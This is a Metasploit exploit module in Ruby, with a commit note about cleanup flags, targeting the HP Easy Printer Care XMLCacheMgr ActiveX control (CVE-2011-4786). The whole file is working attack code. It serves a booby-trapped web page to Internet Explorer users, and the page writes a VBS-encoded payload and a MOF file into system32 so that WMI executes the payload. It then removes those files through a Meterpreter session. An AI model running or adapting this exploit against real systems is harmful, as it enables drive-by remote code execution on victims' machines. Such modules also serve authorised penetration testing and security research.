Adam Cammack
cf9b94a964
The `needs_cleanup` flag needs to be set per-module when an exploit needs an interactive session to clean up. Some `FileDropper` exploits need additional cleanup to what the mixin provides, but since all `FileDropper`s already mark themselves as needing cleanup those are not covered here. A few of these could potentially be refactored to use the original exploitation method to clean up or to compile the list of files/commands to clean up ahead of time, but that is out of the scope of this fix.
157 lines
4.9 KiB
Ruby
157 lines
4.9 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = GreatRanking
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
include Msf::Exploit::EXE
|
|
include Msf::Exploit::WbemExec
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution',
|
|
'Description' => %q{
|
|
This module allows remote attackers to place arbitrary files on a users file
|
|
system by abusing the "CacheDocumentXMLWithId" method from the "XMLCacheMgr"
|
|
class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll
|
|
2.7.2.0).
|
|
|
|
Code execution can be achieved by first uploading the payload to the remote
|
|
machine embeddeding a vbs file, and then upload another mof file, which enables
|
|
Windows Management Instrumentation service to execute the vbs. Please note that
|
|
this module currently only works for Windows before Vista.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Andrea Micalizzi', # aka rgod original discovery
|
|
'juan vazquez', # Metasploit module
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2011-4786' ],
|
|
[ 'OSVDB', '78306' ],
|
|
[ 'BID', '51396' ],
|
|
[ 'ZDI', '12-013' ],
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 2048,
|
|
'StackAdjustment' => -3500,
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
#Windows before Vista
|
|
[ 'Automatic', { } ],
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Jan 11 2012'))
|
|
|
|
self.needs_cleanup = true
|
|
end
|
|
|
|
#
|
|
# The following handles deleting the copied vbs payload and mof file
|
|
# See "struts_code_exec.rb" and "ms10_026_dbldecode.rb" for more information.
|
|
#
|
|
def on_new_session(client)
|
|
|
|
if client.type != "meterpreter"
|
|
print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
|
|
print_error("The vbs payload and mof file must be removed manually.")
|
|
return
|
|
end
|
|
|
|
return if not @var_mof_name
|
|
return if not @var_vbs_name
|
|
|
|
# stdapi must be loaded before we can use fs.file
|
|
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
|
|
|
cmd = "C:\\windows\\system32\\attrib.exe -r " +
|
|
"C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof"
|
|
|
|
client.sys.process.execute(cmd, nil, {'Hidden' => true })
|
|
|
|
begin
|
|
print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...")
|
|
client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs")
|
|
print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...")
|
|
client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof")
|
|
rescue ::Exception => e
|
|
print_error("Exception: #{e.inspect}")
|
|
end
|
|
|
|
end
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
unless request['User-Agent'] =~ /MSIE/
|
|
print_error("Sending 404 for unknown user-agent")
|
|
send_not_found(cli)
|
|
return
|
|
end
|
|
|
|
# Using Windows Management Instrumentation service to execute the payload.
|
|
# Using code from "blackice_downloadimagefileurl.rb". See it for more information.
|
|
|
|
var_xmlcachemgr = rand_text_alpha(rand(5)+5)
|
|
var_mof_function_name = rand_text_alpha(rand(5)+5)
|
|
|
|
content = <<-EOS
|
|
<html>
|
|
<head>
|
|
<script>
|
|
var #{var_xmlcachemgr} = new ActiveXObject('HPESPRIT.XMLCacheMgr.1');
|
|
|
|
function #{var_mof_function_name}() {
|
|
#{var_xmlcachemgr}.CacheDocumentXMLWithId(
|
|
"c:\\\\WINDOWS\\\\system32\\\\wbem\\\\mof\\\\#{@var_mof_name}.mof",
|
|
unescape("#{@mof_content}"),
|
|
1,
|
|
1
|
|
);
|
|
}
|
|
|
|
#{var_xmlcachemgr}.CacheDocumentXMLWithId(
|
|
"C:\\\\WINDOWS\\\\system32\\\\#{@var_vbs_name}.vbs",
|
|
unescape("#{@vbs_content}"),
|
|
1,
|
|
1
|
|
);
|
|
|
|
setTimeout("#{var_mof_function_name}()", 4000);
|
|
</script>
|
|
</head>
|
|
</html>
|
|
EOS
|
|
|
|
print_status("Sending #{self.name}")
|
|
send_response_html(cli, content)
|
|
handler(cli)
|
|
end
|
|
|
|
def exploit
|
|
# In order to save binary data to the file system the payload is written to a .vbs
|
|
# file and execute it from there.
|
|
@var_mof_name = rand_text_alpha(rand(5)+5)
|
|
@var_vbs_name = rand_text_alpha(rand(5)+5)
|
|
|
|
print_status("Encoding payload into vbs...")
|
|
payload = generate_payload_exe
|
|
@vbs_content = Rex::Text.to_hex(Msf::Util::EXE.to_exe_vbs(payload))
|
|
|
|
print_status("Generating mof file...")
|
|
@mof_content = Rex::Text.to_hex(generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs"))
|
|
super
|
|
end
|
|
end
|